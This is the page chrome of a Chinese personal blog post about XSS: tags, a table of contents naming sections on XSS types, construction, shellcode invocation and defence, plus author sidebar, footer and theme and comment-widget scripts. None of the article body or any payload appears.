              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/Shellcode/" rel="tag"># Shellcode</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2020/08/23/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BSQL%E6%B3%A8%E5%85%A5/" rel="next" title="《网络安全》学习之SQL注入">
      《网络安全》学习之SQL注入 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E5%8D%B1%E5%AE%B3"><span class="nav-number">2.</span> <span class="nav-text">XSS危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E6%BC%8F%E6%B4%9E%E7%9A%84%E9%AA%8C%E8%AF%81"><span class="nav-number">3.</span> <span class="nav-text">XSS漏洞的验证</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E7%9A%84%E5%88%86%E7%B1%BB"><span class="nav-number">4.</span> <span class="nav-text">XSS的分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E7%9A%84%E6%9E%84%E9%80%A0"><span class="nav-number">5.</span> <span class="nav-text">XSS的构造</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E7%9A%84%E5%8F%98%E5%BD%A2"><span class="nav-number">6.</span> <span class="nav-text">XSS的变形</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shellcode%E7%9A%84%E8%B0%83%E7%94%A8"><span class="nav-number">7.</span> <span class="nav-text">Shellcode的调用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E9%80%9A%E5%85%B3%E6%8C%91%E6%88%98"><span class="nav-number">8.</span> <span class="nav-text">XSS通关挑战</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E7%9A%84%E9%98%B2%E5%BE%A1"><span class="nav-number">9.</span> <span class="nav-text">XSS的防御</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1DOM-XSS"><span class="nav-number">10.</span> <span class="nav-text">防御DOM-XSS</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="xxx"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">xxx</p>
  <div class="site-description" itemprop="description">Just be happy.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/xinkjung" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;xinkjung" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:xinkjung@gmail.com" title="E-Mail → mailto:xinkjung@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/xinkjung_twt" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;xinkjung_twt" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://youtube.com/xinkjung@gmail.com" title="YouTube → https:&#x2F;&#x2F;youtube.com&#x2F;xinkjung@gmail.com" rel="noopener" target="_blank"><i class="fab fa-youtube fa-fw"></i>YouTube</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://instagram.com/xinkjung" title="Instagram → https:&#x2F;&#x2F;instagram.com&#x2F;xinkjung" rel="noopener" target="_blank"><i class="fab fa-instagram fa-fw"></i>Instagram</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2018 – 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xinkjung</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : '9aeErPsnbqH1YCqhIKmmm2SU-gzGzoHsz',
      appKey     : '2JPcHvNSn7UU5xDJtkQnwbN3',
      placeholder: "Comment ...",
      avatar     : 'identicon',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
